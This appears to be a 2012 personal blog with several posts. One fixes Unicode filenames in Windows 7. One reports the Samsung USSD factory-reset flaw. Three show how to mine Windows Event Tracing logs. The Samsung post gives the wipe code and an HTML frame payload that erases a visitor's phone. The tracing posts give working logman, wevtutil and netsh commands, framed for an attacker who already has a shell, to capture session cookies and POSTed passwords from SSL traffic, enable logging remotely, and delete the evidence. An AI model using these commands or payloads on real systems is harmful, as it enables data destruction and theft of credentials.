Sunday, September 30, 2012

Unicode Filename in Windows 7

Today, out of sudden, my Windows 7 seems does not display unicode filename anymore in Windows Explorer. It doesn't help even I reboot my laptop multiple times.

After searching on the web, it seems like to solution is simple.

  1. Goto c:\windows\fonts
  2. Right click on the "Ming Liu" font and choose "Show".
  3. Reboot.
In order to prevent it happens again in the future:
  • From "Start", type "control" to open the "Control Panel".
  • At the top-right search box, type "fonts".
  • Choose "View installed fonts".
  • At the left pane, choose "Font settings".
  • Uncheck "Hide fonts based on language settings".

Tuesday, September 25, 2012

Wipe out/Factory Reset Samsung Android’s Phones

A major security vulnerability has been disclosed at the Ekoparty 2012 Security Conference which affects Samsung Android handsets.

It it is possible to reset those handsets to factory default settings and in the process wipe out all data. This vulnerability exploits a “secret” code (actually is USSD code) that can be used to trigger the factory reset automatically, without asking any confirmation from the user. That code is: *2767*3855#

There are different methods known to date to push that code onto those handsets:

  • SMS in Wap Push mode (where the user would have to click on a link)
  • QR Code
  • NFC Protocol

Or… if users go to some websites where either
<frame src="tel:*2767*3855%23" />
is contained in the HTML page.

So far, it has been confirmed to work against the Samsung Galaxy S3, the Galaxy Beam, S Advance, Galaxy Ace and Galaxy S II and some HTC devices.

Wednesday, September 19, 2012

Data Mining Event Tracing for Windows 3

This is continue from the previous 2 posts.

The netsh utility has an interface to enable/disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.

To start/stop the trace session:

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING2.etl capture=yes correlation=yes
Trace configuration:-------------------------------------------------------------------Status:             RunningTrace File:         FIREEVERYTHING2.etlAppend:             OffCircular:           OnMax Size:           250 MBReport:             Off

C:\temp>netsh trace stopCorrelating traces ... doneGenerating data collection ... doneThe trace file and additional troubleshooting information have been compiled as "C:\temp\".File location = C:\temp\FIREEVERYTHING2.etlTracing session was successfully stopped.

The netsh utility correlates "like events" and generates several log file and reports containing some interesting data.

As expected we have our "FIREEVERYTHING2.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

To check on human readable content:
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | more

Here is an example of searching for the "passwd" field in a POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.
C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True /f:Text | find /c /i "passwd"0C:\temp>wevtutil qe FIREEVERYTHING2.etl /lf:True | find /c /i "passwd"2

These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!

Tuesday, September 18, 2012

Data Mining Event Tracing for Windows 2

This is continue from the previous post.

The logman utility can allow us to peer into and established SSL session and steal active session cookies after you have shell on a box.

If you do able to sniff the administrator credential, then you can evenenable logging on a remote host using "logman -s <computername>".

The Microsoft-Window-WinInet is only 1 of the providers that you can turn on the logging. To check the full list of providers in your computer, you can:
c:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"

This means there are total of 643 providers available in my computer.

Monday, September 17, 2012

Data Mining Event Tracing for Windows

>>>> From

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.

Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \tempc:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.